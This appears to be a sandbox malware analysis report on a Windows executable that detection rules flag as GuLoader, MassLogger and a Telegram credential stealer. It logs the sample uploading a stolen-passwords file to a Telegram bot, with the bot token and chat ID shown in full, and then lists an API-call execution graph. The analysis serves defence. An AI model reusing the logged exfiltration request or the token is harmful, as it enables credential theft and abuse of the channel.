                                                                                    2025-01-10 20:42:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 38 62 61 30 61 34 35 62 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd358ba0a45b44Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:20 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:20 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:20 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44702,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541740,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    35192.168.2.950044149.154.167.220443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:24 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd318d60772313
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:42:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 64 36 30 37 37 32 33 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd318d60772313Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:25 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:25 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:25 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44703,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541745,"document":{"file_name":"U


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:1
                                                                                    Start time:15:40:15
                                                                                    Start date:10/01/2025
                                                                                    Path:C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\v4nrZtP7K2.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:1'048'063 bytes
                                                                                    MD5 hash:0F45BBAFC276FA80464C8892BA6F5B2A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2034874444.0000000003C88000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:15:40:51
                                                                                    Start date:10/01/2025
                                                                                    Path:C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\v4nrZtP7K2.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:1'048'063 bytes
                                                                                    MD5 hash:0F45BBAFC276FA80464C8892BA6F5B2A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:19.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:19.9%
                                                                                      Total number of Nodes:1599
                                                                                      Total number of Limit Nodes:39
                                                                                      execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4189 405b88 lstrcatW 4186->4189 4190 405b7e 4186->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405ab2 5 API calls 4200 405c94 4197->4200 4199 405c3c FindNextFileW 4201 405c52 FindClose 4199->4201 4199->4213 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4199 4211 405cac 4210->4211 4211->4180 4213->4199 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4229 406417 4215->4229 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4229 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4229 4225 406558 GetWindowsDirectoryW 4225->4229 4226 40667c 5 API calls 4226->4229 4227 40640a 10 API calls 4227->4229 4228 4065d3 lstrcatW 4228->4229 4229->4216 4229->4219 4229->4220 4229->4223 4229->4225 4229->4226 4229->4227 4229->4228 4230 40658c SHGetSpecialFolderLocation 4229->4230 4241 4062b6 4229->4241 4246 40632f wsprintfW 4229->4246 4247 4063e8 lstrcpynW 4229->4247 4230->4229 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4230->4231 4231->4229 4233 406689 4232->4233 4235 4066f2 CharNextW 4233->4235 4237 4066ff 4233->4237 4239 4066de CharNextW 4233->4239 4240 4066ed CharNextW 4233->4240 4253 405cea 4233->4253 4234 406704 CharPrevW 4234->4237 4235->4233 4235->4237 4237->4234 4238 406725 4237->4238 4238->4173 4239->4233 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4229 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4229 4247->4229 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4233 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4266 405cbd 3 API calls 4265->4266 4268 405e2d GetFileAttributesW 4266->4268 4267 40672b 2 API calls 4267->4269 4268->4262 4269->4262 4269->4264 4269->4267 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4213 4284->4283 4286 40546b 4285->4286 4295 40550d 4285->4295 4287 405487 lstrlenW 4286->4287 4288 40640a 17 API calls 4286->4288 4289 4054b0 4287->4289 4290 405495 lstrlenW 4287->4290 4288->4287 4292 4054c3 4289->4292 4293 4054b6 SetWindowTextW 4289->4293 4291 4054a7 lstrcatW 4290->4291 4290->4295 4291->4289 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4213 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4197 4305->4304 4306->4259 4308 405d85 4307->4308 4309 405d97 4307->4309 4308->4309 4310 405d92 CharNextW 4308->4310 4311 405cea CharNextW 4309->4311 4312 405dbb 4309->4312 4310->4312 4311->4309 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4319 4061a9 4318->4319 4320 40609f 4318->4320 4319->4297 4320->4319 4322 4060a7 wsprintfA 4320->4322 4324 40640a 17 API calls 4322->4324 4323 40606e CloseHandle GetShortPathNameW 4323->4319 4325 406082 4323->4325 4326 4060cf 4324->4326 4325->4318 4325->4319 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4319 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4319 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4323 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4364 401423 24 API calls 4360->4364 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4370 40165b 4364->4370 4369 40164a SetCurrentDirectoryW 4369->4370 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4369 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 5311 6ffb22fd 5312 6ffb2367 5311->5312 5313 6ffb2391 5312->5313 5314 6ffb2372 GlobalAlloc 5312->5314 5314->5312 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4895 402659 4894->4895 4896 4026a3 ReadFile 4895->4896 4897 405f61 ReadFile 4895->4897 4898 4026e3 MultiByteToWideChar 4895->4898 4899 402798 4895->4899 4902 40273c 4895->4902 4903 402709 SetFilePointer MultiByteToWideChar 4895->4903 4904 4027a9 4895->4904 4906 402796 4895->4906 4896->4895 4896->4906 4897->4895 4898->4895 4916 40632f wsprintfW 4899->4916 4902->4895 4902->4906 4907 405fbf SetFilePointer 4902->4907 4903->4895 4905 4027ca SetFilePointer 4904->4905 4904->4906 4905->4906 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4902 4916->4906 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4928 405037 4917->4928 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4923 404ed9 4921->4923 4924 404f01 4921->4924 4922 40511b 4926 4051c7 4922->4926 4931 4053af 4922->4931 4938 405174 SendMessageW 4922->4938 4927 40640a 17 API calls 4923->4927 4925 40435f 18 API calls 4924->4925 4930 404f15 4925->4930 4932 4051d1 SendMessageW 4926->4932 4933 4051d9 4926->4933 4934 404ee3 SendMessageW SendMessageW 4927->4934 4928->4922 4929 4050fc 4928->4929 4935 405097 4928->4935 4929->4922 4940 40510d SendMessageW 4929->4940 4937 40435f 18 API calls 4930->4937 4939 4043c6 8 API calls 4931->4939 4932->4933 4941 4051f2 4933->4941 4942 4051eb ImageList_Destroy 4933->4942 4949 405202 4933->4949 4934->4921 4936 404d1a 5 API calls 4935->4936 4952 4050a8 4936->4952 4953 404f23 4937->4953 4938->4931 4944 405189 SendMessageW 4938->4944 4945 4053bd 4939->4945 4940->4922 4946 4051fb GlobalFree 4941->4946 4941->4949 4942->4941 4943 405371 4943->4931 4950 405383 ShowWindow GetDlgItem ShowWindow 4943->4950 4948 40519c 4944->4948 4946->4949 4947 404ff8 GetWindowLongW SetWindowLongW 4951 405011 4947->4951 4959 4051ad SendMessageW 4948->4959 4949->4943 4964 404d9a 4 API calls 4949->4964 4966 40523d 4949->4966 4950->4931 4954 405017 ShowWindow 4951->4954 4955 40502f 4951->4955 4952->4929 4953->4947 4958 404f73 SendMessageW 4953->4958 4960 404ff2 4953->4960 4962 404fc0 SendMessageW 4953->4962 4963 404faf SendMessageW 4953->4963 4973 404394 SendMessageW 4954->4973 4974 404394 SendMessageW 4955->4974 4958->4953 4959->4926 4960->4947 4960->4951 4961 40502a 4961->4931 4962->4953 4963->4953 4964->4966 4965 405347 InvalidateRect 4965->4943 4967 40535d 4965->4967 4968 40526b SendMessageW 4966->4968 4969 405281 4966->4969 4975 404cd5 4967->4975 4968->4969 4969->4965 4970 4052e2 4969->4970 4972 4052f5 SendMessageW SendMessageW 4969->4972 4970->4972 4972->4969 4973->4961 4974->4928 4978 404c0c 4975->4978 4977 404cea 4977->4943 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5318 4016cc 5319 402c41 17 API calls 5318->5319 5320 4016d2 GetFullPathNameW 5319->5320 5321 4016ec 5320->5321 5327 40170e 5320->5327 5324 40672b 2 API calls 5321->5324 5321->5327 5322 401723 GetShortPathNameW 5323 402ac5 5322->5323 5325 4016fe 5324->5325 5325->5327 5328 4063e8 lstrcpynW 5325->5328 5327->5322 5327->5323 5328->5327 5329 40234e 5330 402c41 17 API calls 5329->5330 5331 40235d 5330->5331 5332 402c41 17 API calls 5331->5332 5333 402366 5332->5333 5334 402c41 17 API calls 5333->5334 5335 402370 GetPrivateProfileStringW 5334->5335 5336 4044cf lstrlenW 5337 4044f0 WideCharToMultiByte 5336->5337 5338 4044ee 5336->5338 5338->5337 5339 404850 5340 40487c 5339->5340 5341 40488d 5339->5341 5400 405a32 GetDlgItemTextW 5340->5400 5343 404899 GetDlgItem 5341->5343 5346 4048f8 5341->5346 5345 4048ad 5343->5345 5344 404887 5347 40667c 5 API calls 5344->5347 5349 4048c1 SetWindowTextW 5345->5349 5354 405d68 4 API calls 5345->5354 5350 40640a 17 API calls 5346->5350 5361 4049dc 5346->5361 5398 404b8b 5346->5398 5347->5341 5352 40435f 18 API calls 5349->5352 5356 40496c SHBrowseForFolderW 5350->5356 5351 404a0c 5357 405dc5 18 API calls 5351->5357 5358 4048dd 5352->5358 5353 4043c6 8 API calls 5359 404b9f 5353->5359 5355 4048b7 5354->5355 5355->5349 5364 405cbd 3 API calls 5355->5364 5360 404984 CoTaskMemFree 5356->5360 5356->5361 5362 404a12 5357->5362 5363 40435f 18 API calls 5358->5363 5365 405cbd 3 API calls 5360->5365 5361->5398 5402 405a32 GetDlgItemTextW 5361->5402 5403 4063e8 lstrcpynW 5362->5403 5366 4048eb 5363->5366 5364->5349 5367 404991 5365->5367 5401 404394 SendMessageW 5366->5401 5370 4049c8 SetDlgItemTextW 5367->5370 5375 40640a 17 API calls 5367->5375 5370->5361 5371 4048f1 5373 4067c2 5 API calls 5371->5373 5372 404a29 5374 4067c2 5 API calls 5372->5374 5373->5346 5381 404a30 5374->5381 5376 4049b0 lstrcmpiW 5375->5376 5376->5370 5379 4049c1 lstrcatW 5376->5379 5377 404a71 5404 4063e8 lstrcpynW 5377->5404 5379->5370 5380 404a78 5382 405d68 4 API calls 5380->5382 5381->5377 5385 405d09 2 API calls 5381->5385 5387 404ac9 5381->5387 5383 404a7e GetDiskFreeSpaceW 5382->5383 5386 404aa2 MulDiv 5383->5386 5383->5387 5385->5381 5386->5387 5388 404b3a 5387->5388 5390 404cd5 20 API calls 5387->5390 5389 404b5d 5388->5389 5391 40140b 2 API calls 5388->5391 5405 404381 EnableWindow 5389->5405 5392 404b27 5390->5392 5391->5389 5394 404b3c SetDlgItemTextW 5392->5394 5395 404b2c 5392->5395 5394->5388 5397 404c0c 20 API calls 5395->5397 5396 404b79 5396->5398 5406 4047a9 5396->5406 5397->5388 5398->5353 5400->5344 5401->5371 5402->5351 5403->5372 5404->5380 5405->5396 5407 4047b7 5406->5407 5408 4047bc SendMessageW 5406->5408 5407->5408 5408->5398 5409 401b53 5410 402c41 17 API calls 5409->5410 5411 401b5a 5410->5411 5412 402c1f 17 API calls 5411->5412 5413 401b63 wsprintfW 5412->5413 5414 402ac5 5413->5414 5415 401956 5416 402c41 17 API calls 5415->5416 5417 40195d lstrlenW 5416->5417 5418 402592 5417->5418 5426 6ffb166d 5432 6ffb1516 5426->5432 5428 6ffb16cb GlobalFree 5429 6ffb1685 5429->5428 5430 6ffb16a0 5429->5430 5431 6ffb16b7 VirtualFree 5429->5431 5430->5428 5431->5428 5434 6ffb151c 5432->5434 5433 6ffb1522 5433->5429 5434->5433 5435 6ffb152e GlobalFree 5434->5435 5435->5429 5436 4014d7 5437 402c1f 17 API calls 5436->5437 5438 4014dd Sleep 5437->5438 5440 402ac5 5438->5440 5441 401f58 5442 402c41 17 API calls 5441->5442 5443 401f5f 5442->5443 5444 40672b 2 API calls 5443->5444 5445 401f65 5444->5445 5447 401f76 5445->5447 5448 40632f wsprintfW 5445->5448 5448->5447 5449 402259 5450 402c41 17 API calls 5449->5450 5451 40225f 5450->5451 5452 402c41 17 API calls 5451->5452 5453 402268 5452->5453 5454 402c41 17 API calls 5453->5454 5455 402271 5454->5455 5456 40672b 2 API calls 5455->5456 5457 40227a 5456->5457 5458 40228b lstrlenW lstrlenW 5457->5458 5459 40227e 5457->5459 5461 405450 24 API calls 5458->5461 5460 405450 24 API calls 5459->5460 5463 402286 5460->5463 5462 4022c9 SHFileOperationW 5461->5462 5462->5459 5462->5463 5464 6ffb10e1 5468 6ffb1111 5464->5468 5465 6ffb11d8 GlobalFree 5466 6ffb12ba 2 API calls 5466->5468 5467 6ffb11d3 5467->5465 5468->5465 5468->5466 5468->5467 5469 6ffb1164 GlobalAlloc 5468->5469 5470 6ffb11f8 GlobalFree 5468->5470 5471 6ffb1272 2 API calls 5468->5471 5472 6ffb12e1 lstrcpyW 5468->5472 5473 6ffb11c4 GlobalFree 5468->5473 5469->5468 5470->5468 5471->5473 5472->5468 5473->5468 5305 40175c 5306 402c41 17 API calls 5305->5306 5307 401763 5306->5307 5308 405f0d 2 API calls 5307->5308 5309 40176a 5308->5309 5310 405f0d 2 API calls 5309->5310 5310->5309 5474 401d5d GetDlgItem GetClientRect 5475 402c41 17 API calls 5474->5475 5476 401d8f LoadImageW SendMessageW 5475->5476 5477 402ac5 5476->5477 5478 401dad DeleteObject 5476->5478 5478->5477 5479 4022dd 5480 4022e4 5479->5480 5484 4022f7 5479->5484 5481 40640a 17 API calls 5480->5481 5482 4022f1 5481->5482 5483 405a4e MessageBoxIndirectW 5482->5483 5483->5484 5485 6ffb18d9 5486 6ffb18fc 5485->5486 5487 6ffb1931 GlobalFree 5486->5487 5488 6ffb1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5486->5488 5487->5488 5489 6ffb1272 2 API calls 5488->5489 5490 6ffb1ace GlobalFree GlobalFree 5489->5490 5491 401563 5492 402a6b 5491->5492 5495 40632f wsprintfW 5492->5495 5494 402a70 5495->5494 5496 6ffb1058 5499 6ffb1074 5496->5499 5497 6ffb10dd 5498 6ffb1092 5501 6ffb1516 GlobalFree 5498->5501 5499->5497 5499->5498 5500 6ffb1516 GlobalFree 5499->5500 5500->5498 5502 6ffb10a2 5501->5502 5503 6ffb10a9 GlobalSize 5502->5503 5504 6ffb10b2 5502->5504 5503->5504 5505 6ffb10c7 5504->5505 5506 6ffb10b6 GlobalAlloc 5504->5506 5508 6ffb10d2 GlobalFree 5505->5508 5507 6ffb153d 3 API calls 5506->5507 5507->5505 5508->5497 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4453 402444 4445->4453 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4449 40242e lstrlenW 4447->4449 4448 402463 RegSetValueExW 4452 402479 RegCloseKey 4448->4452 4449->4445 4452->4446 4453->4448 4462 4031d6 4453->4462 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4453 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 405f61 ReadFile 4468 403221 4467->4468 4469 4032de 42 API calls 4468->4469 4476 40329e 4468->4476 4470 403238 4469->4470 4471 4032a4 ReadFile 